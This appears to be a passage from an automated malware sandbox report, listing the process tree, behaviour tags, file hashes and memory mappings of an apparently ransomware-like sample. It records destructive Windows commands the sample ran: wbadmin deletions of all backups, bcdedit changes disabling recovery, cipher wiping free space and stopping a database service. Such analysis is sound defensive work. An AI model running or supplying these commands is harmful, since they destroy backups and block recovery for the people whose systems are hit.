C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest4⤵
-
C:\Windows\system32\wbadmin.exewbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest5⤵
- Deletes System State backups
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin delete backup -keepVersions:0 -quiet3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c wbadmin delete backup -keepVersions:0 -quiet4⤵
-
C:\Windows\system32\wbadmin.exewbadmin delete backup -keepVersions:0 -quiet5⤵
- Deletes system backups
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} recoveryenabled No3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} recoveryenabled No4⤵
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled No5⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures4⤵
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures5⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\SysWOW64\cipher.execipher /w:\\?\C:3⤵
-
C:\Users\Admin\AppData\Local\Temp\64new_cip.exe\\?\C:\Users\Admin\AppData\Local\Temp\64new_cip.exe -network2⤵
- System policy modification
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c pause3⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3068 -s 24602⤵
- Program crash
-
C:\Windows\system32\net.exenet stop SQLBrowser1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLBrowser2⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 444 -p 3068 -ip 30681⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Modifies Installed Components in the registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4572 -s 22162⤵
- Program crash
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 524 -p 4572 -ip 45721⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db.cipherFilesize
624KB
MD5f6842e257d45f170521b603341bb3be3
SHA1020f4a47f039fa987cb6a2aed5be0e8f2691bba2
SHA256dd0a59b0b3eea30bb068e4a0afcfc0e74bd3993544ed4260569e550a52e2cae6
SHA512a387775595d8dbe12819f1760bf3e18840d9e4c6d70589c4e6fda3636b2ee4c244ae32cf853d6f26d671975b8da04d3e3b94b07f0154197a9cac56a34ae50589
-
memory/216-192-0x0000000000000000-mapping.dmp
-
memory/220-144-0x0000000000000000-mapping.dmp
-
memory/376-159-0x0000000000000000-mapping.dmp
-
memory/380-168-0x0000000000000000-mapping.dmp
-
memory/444-178-0x0000000000000000-mapping.dmp
-
memory/520-184-0x0000000000000000-mapping.dmp
-
memory/648-143-0x0000000000000000-mapping.dmp
-
memory/648-194-0x0000000000000000-mapping.dmp
-
memory/724-162-0x0000000000000000-mapping.dmp
-
memory/816-157-0x0000000000000000-mapping.dmp
-
memory/948-195-0x0000000000000000-mapping.dmp
-
memory/964-169-0x0000000000000000-mapping.dmp
-
memory/1104-163-0x0000000000000000-mapping.dmp
-
memory/1476-142-0x0000000000000000-mapping.dmp
-
memory/1476-190-0x0000000000000000-mapping.dmp
-
memory/1488-172-0x0000000000000000-mapping.dmp
-
memory/1568-181-0x0000000000000000-mapping.dmp
-
memory/1696-160-0x0000000000000000-mapping.dmp
-
memory/1844-180-0x0000000000000000-mapping.dmp
-
memory/1924-183-0x0000000000000000-mapping.dmp
-
memory/1944-185-0x0000000000000000-mapping.dmp
-
memory/1952-139-0x0000000000000000-mapping.dmp
-
memory/1960-189-0x0000000000000000-mapping.dmp
-
memory/2392-187-0x0000000000000000-mapping.dmp
-
memory/2392-138-0x0000000000000000-mapping.dmp
-
memory/2440-152-0x0000000000000000-mapping.dmp
-
memory/2732-150-0x0000000000000000-mapping.dmp
-
memory/2804-136-0x0000000000000000-mapping.dmp
-
memory/2840-191-0x0000000000000000-mapping.dmp
-
memory/2896-186-0x0000000000000000-mapping.dmp
-
memory/3064-165-0x0000000000000000-mapping.dmp
-
memory/3080-148-0x0000000000000000-mapping.dmp
-
memory/3124-166-0x0000000000000000-mapping.dmp
-
memory/3156-198-0x0000000000000000-mapping.dmp
-
memory/3156-146-0x0000000000000000-mapping.dmp
-
memory/3176-135-0x0000000000000000-mapping.dmp
-
memory/3268-171-0x0000000000000000-mapping.dmp
-
memory/3452-179-0x0000000000000000-mapping.dmp
-
memory/3548-174-0x0000000000000000-mapping.dmp
-
memory/3620-155-0x0000000000000000-mapping.dmp
-
memory/3708-170-0x0000000000000000-mapping.dmp
-
memory/3844-140-0x0000000000000000-mapping.dmp
-
memory/3988-182-0x0000000000000000-mapping.dmp
-
memory/4012-188-0x0000000000000000-mapping.dmp
-
memory/4092-175-0x0000000000000000-mapping.dmp
-
memory/4108-156-0x0000000000000000-mapping.dmp
-
memory/4116-151-0x0000000000000000-mapping.dmp
-
memory/4124-164-0x0000000000000000-mapping.dmp
-
memory/4160-154-0x0000000000000000-mapping.dmp
-
memory/4180-153-0x0000000000000000-mapping.dmp
-
memory/4240-196-0x0000000000000000-mapping.dmp
-
memory/4300-147-0x0000000000000000-mapping.dmp
-
memory/4328-193-0x0000000000000000-mapping.dmp
-
memory/4400-158-0x0000000000000000-mapping.dmp
-
memory/4420-149-0x0000000000000000-mapping.dmp
-
memory/4468-141-0x0000000000000000-mapping.dmp
-
memory/4492-176-0x0000000000000000-mapping.dmp
-
memory/4532-197-0x0000000000000000-mapping.dmp
-
memory/4612-167-0x0000000000000000-mapping.dmp
-
memory/4732-145-0x0000000000000000-mapping.dmp
-
memory/5036-137-0x0000000000000000-mapping.dmp
-
memory/5080-173-0x0000000000000000-mapping.dmp
-
memory/5104-161-0x0000000000000000-mapping.dmp
-
memory/5108-177-0x0000000000000000-mapping.dmp